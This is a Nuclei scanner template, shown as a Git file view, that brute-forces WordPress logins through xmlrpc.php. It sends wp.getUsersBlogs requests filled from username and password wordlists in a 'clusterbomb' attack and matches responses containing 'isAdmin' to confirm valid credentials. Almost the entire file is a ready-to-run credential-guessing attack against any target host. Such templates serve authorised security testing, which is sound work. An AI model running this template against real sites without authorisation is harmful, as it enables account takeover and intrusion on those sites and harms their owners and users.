nuclei-templates/http/vulnerabilities/wordpress/wp-xmlrpc-brute-force.yaml

53 lines
1.5 KiB
YAML
Raw Normal View History

id: wordpress-xmlrpc-brute-force
info:
name: Wordpress XMLRPC.php username and password Bruteforcer
author: Exid
severity: high
description: This template bruteforces username and passwords through xmlrpc.php being available.
reference:
- https://bugdasht.ir/reports/3c6841c0-ae4c-11eb-a510-517171a9198c
- https://www.acunetix.com/vulnerabilities/web/wordpress-xml-rpc-authentication-brute-force/
metadata:
max-request: 276
2024-03-19 15:20:31 +00:00
tags: wordpress,php,xmlrpc,fuzz
http:
- raw:
- |
POST /xmlrpc.php HTTP/1.1
Host: {{Hostname}}
Content-Length: 235
<?xml version="1.0" encoding="UTF-8"?>
<methodCall>
<methodName>wp.getUsersBlogs</methodName>
<params>
<param>
<value>{{username}}</value>
</param>
<param>
<value>{{password}}</value>
</param>
</params>
</methodCall>
attack: clusterbomb
payloads:
username: helpers/wordlists/wp-users.txt
password: helpers/wordlists/wp-passwords.txt
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- 'url'
- 'xmlrpc'
- 'isAdmin'
condition: and
# digest: 4a0a00473045022100edfa1eaae603d4a662ebaa0eaddba9894ee90c4bd3431bcaae13280d7e9c2fa5022027b501e990478aaca56cc4162f495540c80217172b1c28e0b1516864f9913ad8:922c64590222798bb761d5b6d8e72950